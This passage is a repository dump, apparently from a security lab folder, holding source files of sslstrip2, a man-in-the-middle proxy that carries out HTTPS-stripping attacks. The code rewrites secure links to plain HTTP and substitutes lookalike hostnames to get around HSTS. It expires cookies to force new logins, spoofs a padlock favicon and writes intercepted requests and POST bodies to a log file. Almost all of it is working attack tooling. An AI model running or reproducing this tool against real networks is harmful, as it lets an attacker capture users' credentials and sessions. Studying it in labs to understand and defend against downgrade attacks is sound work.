(key.lower() == 'set-cookie'): 101 | self.client.responseHeaders.addRawHeader(key, value) 102 | else: 103 | self.client.setHeader(key, value) 104 | 105 | def handleEndHeaders(self): 106 | if (self.isImageRequest and self.contentLength != None): 107 | self.client.setHeader("Content-Length", self.contentLength) 108 | 109 | if self.length == 0: 110 | self.shutdown() 111 | 112 | def handleResponsePart(self, data): 113 | if (self.isImageRequest): 114 | self.client.write(data) 115 | else: 116 | HTTPClient.handleResponsePart(self, data) 117 | 118 | def handleResponseEnd(self): 119 | if (self.isImageRequest): 120 | self.shutdown() 121 | else: 122 | HTTPClient.handleResponseEnd(self) 123 | 124 | def handleResponse(self, data): 125 | if (self.isCompressed): 126 | logging.debug("Decompressing content...") 127 | data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read() 128 | 129 | #logging.log(self.getLogLevel(), "Read from server:\n" + data) 130 | logging.log(self.getLogLevel(), "Read from server:\n " ) 131 | 132 | 133 | data = self.replaceSecureLinks(data) 134 | 135 | if (self.contentLength != None): 136 | self.client.setHeader('Content-Length', len(data)) 137 | 138 | self.client.write(data) 139 | self.shutdown() 140 | 141 | def replaceSecureLinks(self, data): 142 | iterator = re.finditer(ServerConnection.urlExpression, data) 143 | 144 | for match in iterator: 145 | url = match.group() 146 | 147 | logging.debug("Found secure reference: " + url) 148 | self.urlMonitor.addSecureLink(self.client.getClientIP(), url) 149 | 150 | data = re.sub(ServerConnection.urlExplicitPort, r'https://\1/', data) 151 | 152 | iter2 = re.finditer(ServerConnection.urlToken1, data) 153 | for match in iter2: 154 | encontrado = match.group() 155 | logging.debug("Token find: "+encontrado+", parsing...") 156 | 157 | iter2 = re.finditer(ServerConnection.urlToken2, data) 158 | for match in iter2: 159 | encontrado = match.group() 160 | logging.debug("Token find: "+encontrado+", parsing....") 161 | 162 | #data = re.sub(ServerConnection.urlToken2, r'\1?ssltoken=1',data) 163 | #data = re.sub(ServerConnection.urlToken1, r'\1ssltoken=1&',data) 164 | return re.sub(ServerConnection.urlType, 'http://', data) 165 | 166 | 167 | def shutdown(self): 168 | if not self.shutdownComplete: 169 | self.shutdownComplete = True 170 | self.client.finish() 171 | self.transport.loseConnection() 172 | 173 | 174 | -------------------------------------------------------------------------------- /lab4/sslstrip2/build/lib.linux-i686-2.7/sslstrip/ServerConnectionFactory.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2009 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | import logging 20 | from twisted.internet.protocol import ClientFactory 21 | 22 | class ServerConnectionFactory(ClientFactory): 23 | 24 | def __init__(self, command, uri, postData, headers, client): 25 | self.command = command 26 | self.uri = uri 27 | self.postData = postData 28 | self.headers = headers 29 | self.client = client 30 | 31 | def buildProtocol(self, addr): 32 | return self.protocol(self.command, self.uri, self.postData, self.headers, self.client) 33 | 34 | def clientConnectionFailed(self, connector, reason): 35 | logging.debug("Server connection failed.") 36 | 37 | destination = connector.getDestination() 38 | 39 | if (destination.port != 443): 40 | logging.debug("Retrying via SSL") 41 | self.client.proxyViaSSL(self.headers['host'], self.command, self.uri, self.postData, self.headers, 443) 42 | else: 43 | self.client.finish() 44 | 45 | -------------------------------------------------------------------------------- /lab4/sslstrip2/build/lib.linux-i686-2.7/sslstrip/StrippingProxy.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2009 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | from twisted.web.http import HTTPChannel 20 | from ClientRequest import ClientRequest 21 | 22 | class StrippingProxy(HTTPChannel): 23 | '''sslstrip is, at heart, a transparent proxy server that does some unusual things. 24 | This is the basic proxy server class, where we get callbacks for GET and POST methods. 25 | We then proxy these out using HTTP or HTTPS depending on what information we have about 26 | the (connection, client_address) tuple in our cache. 27 | ''' 28 | 29 | requestFactory = ClientRequest 30 | -------------------------------------------------------------------------------- /lab4/sslstrip2/build/lib.linux-i686-2.7/sslstrip/URLMonitor.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2009 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | import re 20 | 21 | class URLMonitor: 22 | 23 | ''' 24 | The URL monitor maintains a set of (client, url) tuples that correspond to requests which the 25 | server is expecting over SSL. It also keeps track of secure favicon urls. 26 | ''' 27 | 28 | # Start the arms race, and end up here... 29 | javascriptTrickery = [re.compile("http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html")] 30 | _instance = None 31 | sustitucion = {} # LEO: diccionario host / sustitucion 32 | real = {} # LEO: diccionario host / sustitucion 33 | 34 | def __init__(self): 35 | self.strippedURLs = set() 36 | self.strippedURLPorts = {} 37 | self.faviconReplacement = False 38 | self.sustitucion["mail.google.com"] = "gmail.google.com" 39 | self.real["gmail.google.com"] = "mail.google.com" 40 | 41 | 42 | def isSecureLink(self, client, url): 43 | for expression in URLMonitor.javascriptTrickery: 44 | if (re.match(expression, url)): 45 | return True 46 | 47 | return (client,url) in self.strippedURLs 48 | 49 | def getSecurePort(self, client, url): 50 | if (client,url) in self.strippedURLs: 51 | return self.strippedURLPorts[(client,url)] 52 | else: 53 | return 443 54 | 55 | def addSecureLink(self, client, url): 56 | methodIndex = url.find("//") + 2 57 | method = url[0:methodIndex] 58 | 59 | pathIndex = url.find("/", methodIndex) 60 | host = url[methodIndex:pathIndex] 61 | path = url[pathIndex:] 62 | 63 | port = 443 64 | portIndex = host.find(":") 65 | 66 | if (portIndex != -1): 67 | host = host[0:portIndex] 68 | port = host[portIndex+1:] 69 | if len(port) == 0: 70 | port = 443 71 | 72 | #LEO: Sustituir HOST 73 | 74 | if self.sustitucion.has_key(host.lower()): 75 | host = self.sustitucion[host.lower()] 76 | else: 77 | lhost = host.lower()[:4] 78 | if lhost=="www.": 79 | self.sustitucion[host.lower()] = "w"+host.lower() 80 | self.real["w"+host.lower()] = host.lower() 81 | else: 82 | self.sustitucion[host.lower()] = "web."+host.lower() 83 | self.real["web."+host.lower()] = host.lower() 84 | 85 | url = method + host + path 86 | 87 | self.strippedURLs.add((client, url)) 88 | self.strippedURLPorts[(client, url)] = int(port) 89 | 90 | def setFaviconSpoofing(self, faviconSpoofing): 91 | self.faviconSpoofing = faviconSpoofing 92 | 93 | def isFaviconSpoofing(self): 94 | return self.faviconSpoofing 95 | 96 | def isSecureFavicon(self, client, url): 97 | return ((self.faviconSpoofing == True) and (url.find("favicon-x-favicon-x.ico") != -1)) 98 | 99 | def URLgetRealHost(host): 100 | if self.real.has_key(host): 101 | return self.real[host] 102 | else: 103 | return host 104 | 105 | def getInstance(): 106 | if URLMonitor._instance == None: 107 | URLMonitor._instance = URLMonitor() 108 | 109 | return URLMonitor._instance 110 | 111 | getInstance = staticmethod(getInstance) 112 | -------------------------------------------------------------------------------- /lab4/sslstrip2/build/lib.linux-i686-2.7/sslstrip/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/s0lst1c3/awae/89ec7da010a3b31713bb6c5edb8305d6554cf37f/lab4/sslstrip2/build/lib.linux-i686-2.7/sslstrip/__init__.py -------------------------------------------------------------------------------- /lab4/sslstrip2/build/scripts-2.6/sslstrip: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping attacks.""" 4 | 5 | __author__ = "Moxie Marlinspike && Version b by Leonardo Nve" 6 | __email__ = "moxie@thoughtcrime.org && leonardo.nve@gmail.com" 7 | __license__= """ 8 | Copyright (c) 2004-2009 Moxie Marlinspike 9 | 10 | This program is free software; you can redistribute it and/or 11 | modify it under the terms of the GNU General Public License as 12 | published by the Free Software Foundation; either version 3 of the 13 | License, or (at your option) any later version. 14 | 15 | This program is distributed in the hope that it will be useful, but 16 | WITHOUT ANY WARRANTY; without even the implied warranty of 17 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 18 | General Public License for more details. 19 | 20 | You should have received a copy of the GNU General Public License 21 | along with this program; if not, write to the Free Software 22 | Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 23 | USA 24 | 25 | """ 26 | 27 | from twisted.web import http 28 | from twisted.internet import reactor 29 | 30 | from sslstrip.StrippingProxy import StrippingProxy 31 | from sslstrip.URLMonitor import URLMonitor 32 | from sslstrip.CookieCleaner import CookieCleaner 33 | 34 | import sys, getopt, logging, traceback, string, os 35 | 36 | gVersion = "0.9 Adv" 37 | 38 | def usage(): 39 | print "\nsslstrip " + gVersion + " by Moxie Marlinspike" 40 | print "Version Adv by Leonardo Nve" 41 | print "Usage: sslstrip \n" 42 | print "Options:" 43 | print "-w , --write= Specify file to log to (optional)." 44 | print "-p , --post Log only SSL POSTs. (default)" 45 | print "-s , --ssl Log all SSL traffic to and from server." 46 | print "-a , --all Log all SSL and HTTP traffic to and from server." 47 | print "-l , --listen= Port to listen on (default 10000)." 48 | print "-f , --favicon Substitute a lock favicon on secure requests." 49 | print "-k , --killsessions Kill sessions in progress." 50 | print "-h Print this help message." 51 | print "" 52 | 53 | def parseOptions(argv): 54 | logFile = 'sslstrip.log' 55 | logLevel = logging.WARNING 56 | listenPort = 10000 57 | spoofFavicon = False 58 | killSessions = False 59 | 60 | try: 61 | opts, args = getopt.getopt(argv, "hw:l:psafk", 62 | ["help", "write=", "post", "ssl", "all", "listen=", 63 | "favicon", "killsessions"]) 64 | 65 | for opt, arg in opts: 66 | if opt in ("-h", "--help"): 67 | usage() 68 | sys.exit() 69 | elif opt in ("-w", "--write"): 70 | logFile = arg 71 | elif opt in ("-p", "--post"): 72 | logLevel = logging.WARNING 73 | elif opt in ("-s", "--ssl"): 74 | logLevel = logging.INFO 75 | elif opt in ("-a", "--all"): 76 | logLevel = logging.DEBUG 77 | elif opt in ("-l", "--listen"): 78 | listenPort = arg 79 | elif opt in ("-f", "--favicon"): 80 | spoofFavicon = True 81 | elif opt in ("-k", "--killsessions"): 82 | killSessions = True 83 | 84 | return (logFile, logLevel, listenPort, spoofFavicon, killSessions) 85 | 86 | except getopt.GetoptError: 87 | usage() 88 | sys.exit(2) 89 | 90 | def main(argv): 91 | (logFile, logLevel, listenPort, spoofFavicon, killSessions) = parseOptions(argv) 92 | 93 | logging.basicConfig(level=logLevel, format='%(asctime)s %(message)s', 94 | filename=logFile, filemode='w') 95 | 96 | URLMonitor.getInstance().setFaviconSpoofing(spoofFavicon) 97 | CookieCleaner.getInstance().setEnabled(killSessions) 98 | 99 | strippingFactory = http.HTTPFactory(timeout=10) 100 | strippingFactory.protocol = StrippingProxy 101 | 102 | reactor.listenTCP(int(listenPort), strippingFactory) 103 | 104 | print "\nsslstrip " + gVersion + " by Moxie Marlinspike running..." 105 | print "Adv POC by Leonardo Nve" 106 | 107 | reactor.run() 108 | 109 | if __name__ == '__main__': 110 | main(sys.argv[1:]) 111 | -------------------------------------------------------------------------------- /lab4/sslstrip2/build/scripts-2.7/sslstrip: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping attacks.""" 4 | 5 | __author__ = "Moxie Marlinspike" 6 | __email__ = "moxie@thoughtcrime.org" 7 | __license__= """ 8 | Copyright (c) 2004-2009 Moxie Marlinspike 9 | 10 | This program is free software; you can redistribute it and/or 11 | modify it under the terms of the GNU General Public License as 12 | published by the Free Software Foundation; either version 3 of the 13 | License, or (at your option) any later version. 14 | 15 | This program is distributed in the hope that it will be useful, but 16 | WITHOUT ANY WARRANTY; without even the implied warranty of 17 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 18 | General Public License for more details. 19 | 20 | You should have received a copy of the GNU General Public License 21 | along with this program; if not, write to the Free Software 22 | Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 23 | USA 24 | 25 | """ 26 | 27 | from twisted.web import http 28 | from twisted.internet import reactor 29 | 30 | from sslstrip.StrippingProxy import StrippingProxy 31 | from sslstrip.URLMonitor import URLMonitor 32 | from sslstrip.CookieCleaner import CookieCleaner 33 | 34 | import sys, getopt, logging, traceback, string, os 35 | 36 | gVersion = "0.9b" 37 | 38 | def usage(): 39 | print "\nsslstrip " + gVersion + " by Moxie Marlinspike" 40 | print "Version b by Leonardo Nve" 41 | print "Usage: sslstrip \n" 42 | print "Options:" 43 | print "-w , --write= Specify file to log to (optional)." 44 | print "-p , --post Log only SSL POSTs. (default)" 45 | print "-s , --ssl Log all SSL traffic to and from server." 46 | print "-a , --all Log all SSL and HTTP traffic to and from server." 47 | print "-l , --listen= Port to listen on (default 10000)." 48 | print "-f , --favicon Substitute a lock favicon on secure requests." 49 | print "-k , --killsessions Kill sessions in progress." 50 | print "-h Print this help message." 51 | print "" 52 | 53 | def parseOptions(argv): 54 | logFile = 'sslstrip.log' 55 | logLevel = logging.WARNING 56 | listenPort = 10000 57 | spoofFavicon = False 58 | killSessions = False 59 | 60 | try: 61 | opts, args = getopt.getopt(argv, "hw:l:psafk", 62 | ["help", "write=", "post", "ssl", "all", "listen=", 63 | "favicon", "killsessions"]) 64 | 65 | for opt, arg in opts: 66 | if opt in ("-h", "--help"): 67 | usage() 68 | sys.exit() 69 | elif opt in ("-w", "--write"): 70 | logFile = arg 71 | elif opt in ("-p", "--post"): 72 | logLevel = logging.WARNING 73 | elif opt in ("-s", "--ssl"): 74 | logLevel = logging.INFO 75 | elif opt in ("-a", "--all"): 76 | logLevel = logging.DEBUG 77 | elif opt in ("-l", "--listen"): 78 | listenPort = arg 79 | elif opt in ("-f", "--favicon"): 80 | spoofFavicon = True 81 | elif opt in ("-k", "--killsessions"): 82 | killSessions = True 83 | 84 | return (logFile, logLevel, listenPort, spoofFavicon, killSessions) 85 | 86 | except getopt.GetoptError: 87 | usage() 88 | sys.exit(2) 89 | 90 | def main(argv): 91 | (logFile, logLevel, listenPort, spoofFavicon, killSessions) = parseOptions(argv) 92 | 93 | logging.basicConfig(level=logLevel, format='%(asctime)s %(message)s', 94 | filename=logFile, filemode='w') 95 | 96 | URLMonitor.getInstance().setFaviconSpoofing(spoofFavicon) 97 | CookieCleaner.getInstance().setEnabled(killSessions) 98 | 99 | strippingFactory = http.HTTPFactory(timeout=10) 100 | strippingFactory.protocol = StrippingProxy 101 | 102 | reactor.listenTCP(int(listenPort), strippingFactory) 103 | 104 | print "\nsslstrip " + gVersion + " by Moxie Marlinspike running..." 105 | 106 | reactor.run() 107 | 108 | if __name__ == '__main__': 109 | main(sys.argv[1:]) 110 | -------------------------------------------------------------------------------- /lab4/sslstrip2/debug_ssl.log: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /lab4/sslstrip2/lock.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/s0lst1c3/awae/89ec7da010a3b31713bb6c5edb8305d6554cf37f/lab4/sslstrip2/lock.ico -------------------------------------------------------------------------------- /lab4/sslstrip2/poc.log: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/s0lst1c3/awae/89ec7da010a3b31713bb6c5edb8305d6554cf37f/lab4/sslstrip2/poc.log -------------------------------------------------------------------------------- /lab4/sslstrip2/setup.py: -------------------------------------------------------------------------------- 1 | import sys, os, shutil 2 | from distutils.core import setup, Extension 3 | 4 | 5 | shutil.copyfile("sslstrip.py", "sslstrip/sslstrip") 6 | 7 | setup (name = 'sslstrip', 8 | version = '0.9', 9 | description = 'A MITM tool that implements Moxie Marlinspike\'s HTTPS stripping attacks.', 10 | author = 'Moxie Marlinspike', 11 | author_email = 'moxie@thoughtcrime.org', 12 | url = 'http://www.thoughtcrime.org/software/sslstrip/', 13 | license = 'GPL', 14 | packages = ["sslstrip"], 15 | package_dir = {'sslstrip' : 'sslstrip/'}, 16 | scripts = ['sslstrip/sslstrip'], 17 | data_files = [('share/sslstrip', ['README', 'COPYING', 'lock.ico'])], 18 | ) 19 | 20 | print "Cleaning up..." 21 | try: 22 | removeall("build/") 23 | os.rmdir("build/") 24 | except: 25 | pass 26 | 27 | try: 28 | os.remove("sslstrip/sslstrip") 29 | except: 30 | pass 31 | 32 | def capture(cmd): 33 | return os.popen(cmd).read().strip() 34 | 35 | def removeall(path): 36 | if not os.path.isdir(path): 37 | return 38 | 39 | files=os.listdir(path) 40 | 41 | for x in files: 42 | fullpath=os.path.join(path, x) 43 | if os.path.isfile(fullpath): 44 | f=os.remove 45 | rmgeneric(fullpath, f) 46 | elif os.path.isdir(fullpath): 47 | removeall(fullpath) 48 | f=os.rmdir 49 | rmgeneric(fullpath, f) 50 | 51 | def rmgeneric(path, __func__): 52 | try: 53 | __func__(path) 54 | except OSError, (errno, strerror): 55 | pass 56 | -------------------------------------------------------------------------------- /lab4/sslstrip2/sslstrip.log: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/s0lst1c3/awae/89ec7da010a3b31713bb6c5edb8305d6554cf37f/lab4/sslstrip2/sslstrip.log -------------------------------------------------------------------------------- /lab4/sslstrip2/sslstrip.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping attacks.""" 4 | 5 | __author__ = "Moxie Marlinspike && Version + by Leonardo Nve" 6 | __email__ = "moxie@thoughtcrime.org && leonardo.nve@gmail.com" 7 | __license__= """ 8 | Copyright (c) 2004-2009 Moxie Marlinspike 9 | 10 | This program is free software; you can redistribute it and/or 11 | modify it under the terms of the GNU General Public License as 12 | published by the Free Software Foundation; either version 3 of the 13 | License, or (at your option) any later version. 14 | 15 | This program is distributed in the hope that it will be useful, but 16 | WITHOUT ANY WARRANTY; without even the implied warranty of 17 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 18 | General Public License for more details. 19 | 20 | You should have received a copy of the GNU General Public License 21 | along with this program; if not, write to the Free Software 22 | Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 23 | USA 24 | 25 | """ 26 | 27 | from twisted.web import http 28 | from twisted.internet import reactor 29 | 30 | from sslstrip.StrippingProxy import StrippingProxy 31 | from sslstrip.URLMonitor import URLMonitor 32 | from sslstrip.CookieCleaner import CookieCleaner 33 | 34 | import sys, getopt, logging, traceback, string, os 35 | 36 | gVersion = "0.9 +" 37 | 38 | def usage(): 39 | print "\nsslstrip " + gVersion + " by Moxie Marlinspike" 40 | print "Version + by Leonardo Nve" 41 | print "Usage: sslstrip \n" 42 | print "Options:" 43 | print "-w , --write= Specify file to log to (optional)." 44 | print "-p , --post Log only SSL POSTs. (default)" 45 | print "-s , --ssl Log all SSL traffic to and from server." 46 | print "-a , --all Log all SSL and HTTP traffic to and from server." 47 | print "-l , --listen= Port to listen on (default 10000)." 48 | print "-f , --favicon Substitute a lock favicon on secure requests." 49 | print "-k , --killsessions Kill sessions in progress." 50 | print "-h Print this help message." 51 | print "" 52 | 53 | def parseOptions(argv): 54 | logFile = 'sslstrip.log' 55 | logLevel = logging.WARNING 56 | listenPort = 10000 57 | spoofFavicon = False 58 | killSessions = False 59 | 60 | try: 61 | opts, args = getopt.getopt(argv, "hw:l:psafk", 62 | ["help", "write=", "post", "ssl", "all", "listen=", 63 | "favicon", "killsessions"]) 64 | 65 | for opt, arg in opts: 66 | if opt in ("-h", "--help"): 67 | usage() 68 | sys.exit() 69 | elif opt in ("-w", "--write"): 70 | logFile = arg 71 | elif opt in ("-p", "--post"): 72 | logLevel = logging.WARNING 73 | elif opt in ("-s", "--ssl"): 74 | logLevel = logging.INFO 75 | elif opt in ("-a", "--all"): 76 | logLevel = logging.DEBUG 77 | elif opt in ("-l", "--listen"): 78 | listenPort = arg 79 | elif opt in ("-f", "--favicon"): 80 | spoofFavicon = True 81 | elif opt in ("-k", "--killsessions"): 82 | killSessions = True 83 | 84 | return (logFile, logLevel, listenPort, spoofFavicon, killSessions) 85 | 86 | except getopt.GetoptError: 87 | usage() 88 | sys.exit(2) 89 | 90 | def main(argv): 91 | (logFile, logLevel, listenPort, spoofFavicon, killSessions) = parseOptions(argv) 92 | 93 | logging.basicConfig(level=logLevel, format='%(asctime)s %(message)s', 94 | filename=logFile, filemode='w') 95 | 96 | URLMonitor.getInstance().setFaviconSpoofing(spoofFavicon) 97 | CookieCleaner.getInstance().setEnabled(killSessions) 98 | 99 | strippingFactory = http.HTTPFactory(timeout=10) 100 | strippingFactory.protocol = StrippingProxy 101 | 102 | reactor.listenTCP(int(listenPort), strippingFactory) 103 | 104 | print "\nsslstrip " + gVersion + " by Moxie Marlinspike running..." 105 | print "+ POC by Leonardo Nve" 106 | 107 | reactor.run() 108 | 109 | if __name__ == '__main__': 110 | main(sys.argv[1:]) 111 | -------------------------------------------------------------------------------- /lab4/sslstrip2/sslstrip/ClientRequest.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2009 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | import urlparse, logging, os, sys, random, re 20 | 21 | from twisted.web.http import Request 22 | from twisted.web.http import HTTPChannel 23 | from twisted.web.http import HTTPClient 24 | 25 | from twisted.internet import ssl 26 | from twisted.internet import defer 27 | from twisted.internet import reactor 28 | from twisted.internet.protocol import ClientFactory 29 | 30 | from ServerConnectionFactory import ServerConnectionFactory 31 | from ServerConnection import ServerConnection 32 | from SSLServerConnection import SSLServerConnection 33 | from URLMonitor import URLMonitor 34 | from CookieCleaner import CookieCleaner 35 | from DnsCache import DnsCache 36 | 37 | def NUEVO_LOG(str): 38 | return 39 | 40 | class ClientRequest(Request): 41 | 42 | ''' This class represents incoming client requests and is essentially where 43 | the magic begins. Here we remove the client headers we dont like, and then 44 | respond with either favicon spoofing, session denial, or proxy through HTTP 45 | or SSL to the server. 46 | ''' 47 | 48 | def __init__(self, channel, queued, reactor=reactor): 49 | Request.__init__(self, channel, queued) 50 | self.reactor = reactor 51 | self.urlMonitor = URLMonitor.getInstance() 52 | self.cookieCleaner = CookieCleaner.getInstance() 53 | self.dnsCache = DnsCache.getInstance() 54 | # self.uniqueId = random.randint(0, 10000) 55 | 56 | def cleanHeaders(self): 57 | headers = self.getAllHeaders().copy() 58 | if 'accept-encoding' in headers: 59 | del headers['accept-encoding'] 60 | 61 | if 'referer' in headers: 62 | real = self.urlMonitor.real 63 | if len(real)>0: 64 | dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys()))) 65 | headers['referer'] = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), headers['referer']) 66 | 67 | if 'if-modified-since' in headers: 68 | del headers['if-modified-since'] 69 | 70 | if 'cache-control' in headers: 71 | del headers['cache-control'] 72 | 73 | if 'if-none-match' in headers: 74 | del headers['if-none-match'] 75 | 76 | if 'host' in headers: 77 | host = self.urlMonitor.URLgetRealHost("%s"%headers['host']) 78 | logging.debug("Modifing HOST header: %s -> %s"%(headers['host'],host)) 79 | headers['host'] = host 80 | #headers['securelink'] = '1' 81 | self.setHeader('Host',host) 82 | 83 | return headers 84 | 85 | def getPathFromUri(self): 86 | if (self.uri.find("http://") == 0): 87 | index = self.uri.find('/', 7) 88 | return self.uri[index:] 89 | 90 | return self.uri 91 | 92 | 93 | def getPathToLockIcon(self): 94 | if os.path.exists("lock.ico"): return "lock.ico" 95 | 96 | scriptPath = os.path.abspath(os.path.dirname(sys.argv[0])) 97 | scriptPath = os.path.join(scriptPath, "../share/sslstrip/lock.ico") 98 | 99 | if os.path.exists(scriptPath): return scriptPath 100 | 101 | logging.warning("Error: Could not find lock.ico") 102 | return "lock.ico" 103 | 104 | def save_req(self,lfile,str): 105 | f = open(lfile,"a") 106 | f.write(str) 107 | f.close() 108 | 109 | def handleHostResolvedSuccess(self, address): 110 | headers = self.cleanHeaders() 111 | # for header in headers: 112 | # logging.debug("HEADER %s = %s",header,headers[header]) 113 | logging.debug("Resolved host successfully: %s -> %s" % (self.getHeader('host').lower(), address)) 114 | lhost = self.getHeader("host").lower() 115 | host = self.urlMonitor.URLgetRealHost("%s"%lhost) 116 | client = self.getClientIP() 117 | path = self.getPathFromUri() 118 | self.content.seek(0,0) 119 | postData = self.content.read() 120 | real = self.urlMonitor.real 121 | patchDict = self.urlMonitor.patchDict 122 | 123 | if len(real)>0: 124 | dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys()))) 125 | path = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), path) 126 | postData = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), postData) 127 | if len(patchDict)>0: 128 | dregex = re.compile("(%s)" % "|".join(map(re.escape, patchDict.keys()))) 129 | postData = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), postData) 130 | 131 | url = 'http://' + host + path 132 | headers['content-length']="%d"%len(postData) 133 | 134 | self.dnsCache.cacheResolution(host, address) 135 | if (not self.cookieCleaner.isClean(self.method, client, host, headers)): 136 | logging.debug("Sending expired cookies...") 137 | self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client, 138 | host, headers, path)) 139 | elif (self.urlMonitor.isSecureFavicon(client, path)): 140 | logging.debug("Sending spoofed favicon response...") 141 | self.sendSpoofedFaviconResponse() 142 | elif (self.urlMonitor.isSecureLink(client, url) or ('securelink' in headers)): 143 | if 'securelink' in headers: 144 | del headers['securelink'] 145 | logging.debug("LEO Sending request via SSL...(%s %s)"%(client,url)) 146 | self.proxyViaSSL(address, self.method, path, postData, headers, 147 | self.urlMonitor.getSecurePort(client, url)) 148 | else: 149 | logging.debug("LEO Sending request via HTTP...") 150 | self.proxyViaHTTP(address, self.method, path, postData, headers) 151 | 152 | def handleHostResolvedError(self, error): 153 | logging.warning("Host resolution error: " + str(error)) 154 | self.finish() 155 | 156 | def resolveHost(self, host): 157 | address = self.dnsCache.getCachedAddress(host) 158 | 159 | if address != None: 160 | logging.debug("Host cached.") 161 | return defer.succeed(address) 162 | else: 163 | logging.debug("Host not cached.") 164 | return reactor.resolve(host) 165 | 166 | def process(self): 167 | host = self.urlMonitor.URLgetRealHost("%s"%self.getHeader('host')) 168 | logging.debug("Resolving host: %s" % host) 169 | deferred = self.resolveHost(host) 170 | 171 | deferred.addCallback(self.handleHostResolvedSuccess) 172 | deferred.addErrback(self.handleHostResolvedError) 173 | 174 | def proxyViaHTTP(self, host, method, path, postData, headers): 175 | connectionFactory = ServerConnectionFactory(method, path, postData, headers, self) 176 | self.save_req("debug_ssl.log",method+' http://'+host+path+'\n'+str(headers)+'\n'+postData+'\n') 177 | connectionFactory.protocol = ServerConnection 178 | self.reactor.connectTCP(host, 80, connectionFactory) 179 | 180 | def proxyViaSSL(self, host, method, path, postData, headers, port): 181 | self.save_req("debug_ssl.log",method+' https://'+host+path+'\n'+str(headers)+'\n'+postData+'\n') 182 | clientContextFactory = ssl.ClientContextFactory() 183 | connectionFactory = ServerConnectionFactory(method, path, postData, headers, self) 184 | connectionFactory.protocol = SSLServerConnection 185 | self.reactor.connectSSL(host, port, connectionFactory, clientContextFactory) 186 | 187 | def sendExpiredCookies(self, host, path, expireHeaders): 188 | self.setResponseCode(302, "Moved") 189 | self.setHeader("Connection", "close") 190 | self.setHeader("Location", "http://" + host + path) 191 | 192 | for header in expireHeaders: 193 | self.setHeader("Set-Cookie", header) 194 | 195 | self.finish() 196 | 197 | def sendSpoofedFaviconResponse(self): 198 | icoFile = open(self.getPathToLockIcon()) 199 | 200 | self.setResponseCode(200, "OK") 201 | self.setHeader("Content-type", "image/x-icon") 202 | self.write(icoFile.read()) 203 | 204 | icoFile.close() 205 | self.finish() 206 | -------------------------------------------------------------------------------- 